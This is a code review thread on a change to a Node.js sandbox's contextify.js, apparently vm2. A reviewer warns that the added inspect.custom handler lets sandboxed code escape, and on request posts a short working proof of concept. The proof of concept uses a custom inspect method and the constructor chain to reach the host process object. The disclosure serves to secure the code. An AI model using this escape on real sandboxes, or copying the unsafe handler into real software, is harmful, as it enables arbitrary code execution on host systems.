lib/contextify.js

```diff
@@ -199,6 +199,11 @@ Decontextify.instance = (instance, klass, deepTraps, flags, toStringTag) => {
 		if (key === '__lookupGetter__') return host.Object.prototype.__lookupGetter__;
 		if (key === '__lookupSetter__') return host.Object.prototype.__lookupSetter__;
 		if (key === host.Symbol.toStringTag && toStringTag) return toStringTag;
+		if (key === host.inspect.custom) {
+			return (depth, options) => {
+				return host.inspect(instance, options.showHidden, depth, options.colors);
```

Comment:
This is unsafe. The instance object is from the sandbox and is passed into the host function inspect. This can be used to escape the sandbox. Here custom implementations inside the sandbox are required.

Reply:
I see. Can you please offer me an example?

Reply:
Here you go:
```JS
const vm = new VM();
const code = '(' + function() {
    const customInspect = Symbol.for('nodejs.util.inspect.custom');
    Date.prototype[customInspect] = (depth, options) => {throw options.constructor.constructor('return process')()};
    return new Date();
}+')();';
const bad_object = vm.run(code);
console.log("Still good");
console.log(bad_object);
console.log("Logging is bad");
```